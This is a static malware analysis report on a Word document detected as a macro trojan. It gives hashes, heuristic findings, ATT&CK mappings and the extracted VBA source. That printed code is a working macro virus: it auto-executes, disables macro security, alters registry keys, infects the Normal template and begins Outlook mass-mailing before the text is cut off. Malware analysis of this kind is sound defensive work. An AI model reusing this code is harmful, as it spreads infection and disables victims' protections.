Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7e9a1710345357aa…

MALICIOUS

Office (OLE)

42.5 KB Created: 2000-08-21 21:04:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 3229ba00295d33114e948fa2534a60ff SHA-1: 5d77a008d7699c3fa3009ea2a595db1291f48f6c SHA-256: 7e9a1710345357aa0d795543eb5753ab5af765545ad1969f6fb49a41ceb48d65
260 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains VBA macros that execute upon opening the document. The macro attempts to disable security features and modify registry keys, specifically setting 'RegisteredOwner' to 'Alina Liton' and 'FatehIns' to the current date. This behavior suggests an attempt to establish persistence or prepare the system for a subsequent payload.

Heuristics 5

  • ClamAV: Doc.Trojan.Cobra-11 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Cobra-11
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4806 bytes
SHA-256: 8482bcac51059b5e7dd2ef7ab242c222ed645698201eda3df7e77814f530894e
Detection
ClamAV: Win.Trojan.wmvg-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Day_2"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_New()
Call A0AX
End Sub
Private Sub Document_Close()
Call A0AX
End Sub
Private Sub Document_Open()
Call A0AX
End Sub
Private Sub A0AX()
On Error Resume Next
CustomizationContext = NormalTemplate
FindKey(KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF8)).Disable
FindKey(KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF11)).Disable
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Lavel") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Lavel") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
CommandBars("Tools").Controls("Macro").Visible = False
CommandBars("View").Controls("Toolbars").Enabled = False
CommandBars("View").Controls("Toolbars").Visible = False
Options.VirusProtection = False: Options.SaveNormalPrompt = False: Options.ConfirmConversions = False
End If
If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\", "RegisteredOwner") <> "Alina Liton" Then
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\", "RegisteredOwner") = "Alina Liton"
End If
InsFat = Date
If Not IsDate(System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "FatehIns")) Then
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "FatehIns") = Date
Else
InsFat = System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "FatehIns")
End If
TotDy = DateValue(Date) - DateValue(InsFat)
If TotDy > 30 Then
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "ProductId") = "Fateha-Liton-Alina"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "SystemRoot") = "C:\A0AAX"
End If
Set ADC1 = ActiveDocument.VBProject.VBComponents(1): Set NDC1 = NormalTemplate.VBProject.VBComponents(1)
ExportFile1 = NormalTemplate.Path + "\Fateha.dll": ExportFile2 = NormalTemplate.Path + "\Liton.dll"
If UCase(Dir(ExportFile1)) = UCase("Fateha.dll") Then Kill ExportFile1
If UCase(Dir(ExportFile2)) = UCase("Liton.dll") Then Kill ExportFile2
If ADC1.CodeModule.CountOfLines > 0 Then ADC1.Export (ExportFile1)
If NDC1.CodeModule.CountOfLines > 0 Then NDC1.Export (ExportFile2)
If ADC1.CodeModule.CountOfLines > 0 Then
For i = 1 To ADC1.CodeModule.CountOfLines: ADC1.CodeModule.DeleteLines 1: Next
End If
ADC1.CodeModule.AddFromFile (ExportFile2)
If ADC1.CodeModule.CountOfLines > 0 Then
For i = 1 To 4: ADC1.CodeModule.DeleteLines 1: Next
Else
ADC1.CodeModule.AddFromFile (ExportFile1)
For i = 1 To 4: ADC1.CodeModule.DeleteLines 1: Next: End If
If NDC1.CodeModule.CountOfLines > 0 Then
For i = 1 To NDC1.CodeModule.CountOfLines: NDC1.CodeModule.DeleteLines 1: Next
End If
NDC1.CodeModule.AddFromFile (ExportFile1)
If NDC1.CodeModule.CountOfLines > 0 Then
For i = 1 To 4: NDC1.CodeModule.DeleteLines 1: Next
Else
NDC1.CodeModule.AddFromFile (ExportFile1)
For i = 1 To 4: NDC1.CodeModule.DeleteLines 1: Next
End If
WD = WeekDay(Date)
WD = "Day_" + Trim(Str(WD))
If NDC1.Name <> WD Then NDC1.Name = WD
If ADC1.Name <> "DT" & Trim(Str(Month(Date))) + "_" + Trim(Str(Year(Date))) Then ADC1.Name = "DT" & Trim(Str(Month(Date))) + "_" + Trim(Str(Year(Date)))
Dim UDO, DMN, BUOS
Set UDO = CreateObject("Outlook.Application")
Set DMN = UDO.GetNameSpace("MAPI")
DMN.Logon "profile", "password"
For l = DMN.AddressLists.Count To 1 Step -1
Set ADB = DMN.AddressLists(l)
i = 0
Set BUOS = UDO.CreateItem(0)
For t = ADB.AdressEntries.Count To 1 Step -1
o = ADB.AddressEntries(i)
BUOS.Recipients.Add o
i = i + 1
If 
... (truncated)